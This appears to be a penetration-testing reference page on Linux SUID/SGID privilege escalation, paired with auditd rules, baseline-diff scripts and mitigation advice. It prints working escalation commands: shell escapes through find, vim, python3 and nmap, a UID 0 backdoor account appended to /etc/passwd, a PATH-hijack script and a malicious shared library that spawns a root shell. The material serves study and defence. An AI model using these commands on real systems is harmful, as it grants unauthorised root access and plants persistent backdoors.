SUID/SGID Exploitation

Overview

The Set User ID (SUID) bit makes a binary run with the effective UID of the file owner rather than of the caller. When it is set on a root-owned binary, any user executing it gets an effective UID of 0 while the real UID stays their own. SGID (Set Group ID) does the same for the effective GID. Linux ignores both bits on shebang scripts, so the attack surface is compiled binaries: custom helpers, outdated tools, and misconfigured utilities that carry the bit are common privilege escalation vectors.

Standard SUID binaries such as passwd, su, sudo, mount, and (on older distributions) ping are expected; many current distributions give ping the cap_net_raw capability instead of the bit. The attack surface is the non-standard entries: anything installed by administrators or third-party applications, and any standard tool whose version has a known escalation.

ATT&CK Mapping

  • Tactic: TA0004 - Privilege Escalation
  • Technique: T1548.001 - Abuse Elevation Control Mechanism: Setuid and Setgid

Prerequisites

  • Shell access as a low-privileged user
  • Ability to execute find to discover SUID/SGID binaries

Techniques

Discovery

# Find all SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Find all SGID binaries
find / -perm -2000 -type f 2>/dev/null

# Both SUID and SGID
find / \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null

# With details (owner, permissions)
find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null

Compare the results against the set the distribution ships (dpkg -S or rpm -qf tells you whether a package owns the file) and against a known-good baseline. Anything unfamiliar, unpackaged, or sitting in /tmp, /home, /opt or an application directory is worth investigating. Cross-reference the binary name and version with GTFOBins for known exploitation techniques.
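The triage step above, as an added example (not code from the original page): it enumerates SUID/SGID files under a given root, checks each against an allowlist of names that distributions normally ship, asks the package manager whether it owns the file, and prints one classified line per entry. The EXPECTED list is a constructed starting point and must be tuned to the target.

```shell
#!/bin/sh
# suid-triage.sh: enumerate SUID/SGID files under ROOT and sort them into
# EXPECTED (name on the allowlist) and SUSPECT (everything else), noting
# whether dpkg or rpm knows the file. The allowlist is an assumption.

EXPECTED="passwd su sudo mount umount ping chsh chfn gpasswd newgrp pkexec fusermount fusermount3 ssh-keysign unix_chkpwd"

# is_expected NAME -> exit 0 when NAME is on the allowlist
is_expected() {
    for e in $EXPECTED; do
        [ "$1" = "$e" ] && return 0
    done
    return 1
}

# pkg_of PATH -> prints the owning package, or nothing if no package claims the file
pkg_of() {
    if command -v dpkg >/dev/null 2>&1; then
        dpkg -S "$1" 2>/dev/null | cut -d: -f1 | head -n 1
    elif command -v rpm >/dev/null 2>&1; then
        rpm -qf "$1" 2>/dev/null | grep -v 'not owned' || true
    fi
}

# enumerate ROOT -> "mode owner group path" for every SUID or SGID regular
# file under ROOT, without crossing into other filesystems
enumerate() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -printf '%m %u %g %p\n' 2>/dev/null
}

# triage ROOT -> one line per file: CLASS mode owner package path
triage() {
    enumerate "$1" | while read -r mode owner group path; do
        pkg=$(pkg_of "$path")
        [ -n "$pkg" ] || pkg="unpackaged"
        if is_expected "$(basename "$path")"; then
            printf 'EXPECTED %s %s %s %s\n' "$mode" "$owner" "$pkg" "$path"
        else
            printf 'SUSPECT  %s %s %s %s\n' "$mode" "$owner" "$pkg" "$path"
        fi
    done
}

# count_suspects ROOT -> number of SUSPECT lines, for scripting
count_suspects() {
    triage "$1" | grep -c '^SUSPECT' || true
}

# Usage: ./suid-triage.sh /
if [ -n "${1:-}" ]; then
    triage "$1"
fi
```

A SUSPECT line that also reads "unpackaged" is the first thing to open in strings and ltrace; an EXPECTED line is still worth a version check against GTFOBins (nmap and older vim are both "expected" names).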

GTFOBins SUID Exploits

GTFOBins documents exploitation techniques for Unix binaries. When a SUID binary appears in GTFOBins, use the "SUID" section for the exact escalation command.

Common SUID escalation examples:

# find (SUID)
find . -exec /bin/sh -p \; -quit

# vim (SUID): the :! escape goes through $SHELL, which drops the effective UID when it is bash,
# so GTFOBins uses vim's embedded Python instead (needs +python3; use :py for Python 2)
vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

# python3 (SUID)
python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'

# bash (SUID): requires -p to preserve the effective UID
bash -p

# env (SUID)
env /bin/sh -p

# nmap (versions 2.02 to 5.21 have an interactive mode, SUID)
nmap --interactive
# then: !sh

# cp (SUID): append a UID 0 user to /etc/passwd. A hash in the password field takes
# precedence over /etc/shadow. Keep the backup so the file can be restored afterwards.
cp /etc/passwd /tmp/passwd.bak
echo "root2:$(openssl passwd -1 password):0:0:root:/root:/bin/bash" >> /tmp/passwd.bak
cp /tmp/passwd.bak /etc/passwd
su root2

# less/more (SUID): read protected files directly. The ! escape spawns $SHELL -c, so it
# only gives a root shell when that shell keeps the effective UID (see the -p note below).
less /etc/shadow
# then type: !/bin/sh -p

The -p flag is critical for bash: when bash starts with an effective UID that differs from the real UID and -p is not given, it resets the effective UID to the real UID, silently undoing the escalation. Newer dash releases behave the same way and added a -p option for the same purpose. This also bites anything that spawns a shell indirectly (system(), popen(), a pager's ! escape, an editor's :! command), because that intermediate /bin/sh may drop the privilege before your command runs. Confirm the result with id: a successful escalation shows euid=0(root) next to the unprivileged uid.

Custom SUID Binaries

Custom SUID binaries often call system utilities through system() or popen() without full paths. If the binary does not reset PATH before doing so, the caller controls which executable gets resolved:

# Identify what a custom SUID binary does: look for bare command names and for setuid/setresuid calls
strings /path/to/suid-binary
# ptrace disables the SUID bit, so these run the binary with your own privileges, but they still show the calls it makes
ltrace /path/to/suid-binary 2>&1
strace -f -e trace=execve,setuid,setresuid /path/to/suid-binary 2>&1

# If the binary calls a command without a full path (e.g., "service" instead of "/usr/sbin/service"):
# 1. Create a script with the same name; -p on the shebang keeps the inherited effective UID
cat > /tmp/service <<'EOF'
#!/bin/bash -p
exec /bin/bash -p
EOF
chmod +x /tmp/service

# 2. Prepend /tmp to PATH
export PATH=/tmp:$PATH

# 3. Run the SUID binary; it resolves "service" to /tmp/service
/path/to/suid-binary

This only yields root if the effective UID survives all the way to the fake command. A binary that calls setuid(0) or setresuid(0,0,0) before system() is the easy case; one that leaves the real UID unprivileged depends on /bin/sh not resetting the effective UID (see the -p note above), in which case a /bin/sh that is dash on an older release works and bash does not.

Shared Library Injection

The dynamic loader runs SUID binaries in secure-execution mode: LD_LIBRARY_PATH is ignored and LD_PRELOAD is restricted to setuid-marked libraries in the standard directories. The usable paths are therefore the ones the binary itself asks for (an RPATH/RUNPATH entry, a dlopen() with a relative or user-controlled path) or a default search directory that happens to be writable:

# Check library dependencies and where each one resolves
ldd /path/to/suid-binary

# Check for a hard-coded search path that points into a writable directory
readelf -d /path/to/suid-binary | grep -E 'RPATH|RUNPATH'

# Check for libraries that are searched for but missing
strace -f -e trace=openat /path/to/suid-binary 2>&1 | grep -E '\.so.*ENOENT'

# If a library is loaded from a writable directory, build a replacement whose constructor runs at load time.
# It must also export every symbol the binary imports from the original (nm -D --undefined-only binary),
# otherwise the loader aborts with an undefined symbol before main() runs.
cat > malicious.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>

/* runs when the loader maps the library, before the target's main() */
__attribute__((constructor))
static void pwn(void) {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
}
EOF

gcc -shared -fPIC -o /writable/path/libmissing.so malicious.c
# Run the SUID binary; the loader maps our library and the constructor runs as root
/path/to/suid-binary

/etc/passwd Write

If you can write to /etc/passwd (through a SUID cp or tee, or because the file is simply world-writable), a hash placed directly in the password field is honoured even though /etc/shadow exists, so a second UID 0 account is enough:

# Generate a password hash (-1 is MD5-crypt; OpenSSL 1.1.1 and later also accept -6 for SHA-512)
openssl passwd -1 -salt xyz password123

# Add a UID 0 user whose entry carries that hash
echo "newroot:$(openssl passwd -1 -salt xyz password123):0:0:root:/root:/bin/bash" >> /etc/passwd

# Switch to the new user
su newroot
# Password: password123

Detection Methods

Network-Based Detection

  • Not applicable: SUID exploitation is local to the compromised host. What the network may see is the follow-on activity, such as new outbound connections from a process running as root.

Host-Based Detection

  • Monitor for the SUID/SGID bit being set: a file watch such as auditctl -w /usr/bin/ -p wa catches changes under system directories, and an auditd syscall rule on chmod/fchmod/fchmodat keyed to the login UID catches a user planting a SUID copy of bash anywhere
  • Alert on new SUID binaries appearing in non-standard locations (/tmp, /home, /var/tmp, /dev/shm) and on SUID files that no installed package owns
  • Monitor for processes running with effective UID 0 whose login UID belongs to a non-root user; a root shell spawned from a non-standard binary is the usual end state of a SUID exploit
  • File integrity monitoring (AIDE, OSSEC) with the SUID inventory, /etc/passwd, and /etc/shadow in scope, so both new binaries and the UID 0 account added by the /etc/passwd write are caught

Mitigation Strategies

  • Minimize SUID binaries: audit and remove the bit from any binary that does not strictly require it: chmod u-s /path/to/binary (chmod g-s for SGID)
  • Mount with nosuid: mount user-writable filesystems (/tmp, /home, /var/tmp, /dev/shm) with the nosuid option in /etc/fstab, so a SUID file planted there runs without elevated privileges
  • Use capabilities instead: replace SUID with the specific Linux capability the program needs (e.g., setcap cap_net_raw+ep /bin/ping instead of a root-owned SUID ping) and verify with getcap
  • Regular audits: periodically compare the SUID inventory (find / -perm /6000 -type f) against a known-good baseline and investigate every addition
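The detection and audit items above as runnable checks, added here as an example rather than code from the original page. It takes a sorted SUID inventory snapshot, diffs it against a saved baseline, flags extra UID 0 accounts in a passwd file (the /etc/passwd write technique), reports watched mount points that lack nosuid, and prints auditd rules for the SUID-bit and root-shell detections. The baseline format and the list of watched mount points are assumptions to adjust per environment.

```shell
#!/bin/sh
# suid-audit.sh: defender-side checks for the techniques on this page.

# snapshot ROOT -> sorted "mode owner path" inventory of SUID/SGID files,
# suitable for storing as the baseline
snapshot() {
    find "$1" -xdev -type f -perm /6000 -printf '%m %u %p\n' 2>/dev/null | LC_ALL=C sort
}

# baseline_diff BASELINE CURRENT -> prints "+ entry" for additions and
# "- entry" for removals (both files sorted); returns 1 when anything changed
baseline_diff() {
    added=$(LC_ALL=C comm -13 "$1" "$2")
    removed=$(LC_ALL=C comm -23 "$1" "$2")
    [ -z "$added" ] || printf '%s\n' "$added" | sed 's/^/+ /'
    [ -z "$removed" ] || printf '%s\n' "$removed" | sed 's/^/- /'
    [ -z "$added$removed" ]
}

# uid0_accounts PASSWD -> usernames other than root with UID 0, flagged when
# the password field carries a hash instead of pointing at /etc/shadow
uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" {
        flag = ($2 == "x" || $2 == "*" || $2 == "!") ? "" : " (hash in passwd)"
        print $1 flag
    }' "$1"
}

# missing_nosuid MOUNTS -> watched mount points lacking nosuid, read from a
# file in /proc/mounts format (device mountpoint fstype options ...)
missing_nosuid() {
    awk -v watch="/tmp /var/tmp /home /dev/shm" '
        BEGIN { n = split(watch, w, " "); for (i = 1; i <= n; i++) want[w[i]] = 1 }
        ($2 in want) && $4 !~ /(^|,)nosuid(,|$)/ { print $2 }' "$1"
}

# audit_rules -> auditd rules covering the host-based detections above
audit_rules() {
    cat <<'EOF'
# any mode change by an interactive user (catches chmod u+s by a non-root login)
-a always,exit -F arch=b64 -S chmod,fchmod,fchmodat -F auid>=1000 -F auid!=unset -k perm_mod
# any execve with effective UID 0 on behalf of a non-root login (root shell from a SUID exploit)
-a always,exit -F arch=b64 -S execve -F euid=0 -F auid>=1000 -F auid!=unset -k privesc
# credential files, so an appended UID 0 account is logged
-w /etc/passwd -p wa -k identity
-w /etc/shadow -p wa -k identity
EOF
}

# Usage: ./suid-audit.sh check        (live checks on this host)
#        ./suid-audit.sh snapshot / > baseline.txt; later: snapshot / > now.txt; baseline_diff baseline.txt now.txt
if [ "${1:-}" = "check" ]; then
    uid0_accounts /etc/passwd
    missing_nosuid /proc/mounts
elif [ "${1:-}" = "snapshot" ]; then
    snapshot "${2:-/}"
fi
```

The execve rule will also fire for legitimate sudo and su sessions; filter on the exe or comm field of the resulting records, or on auid ranges that should never elevate, rather than dropping the rule.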

References

Pentest Guides & Research

MITRE ATT&CK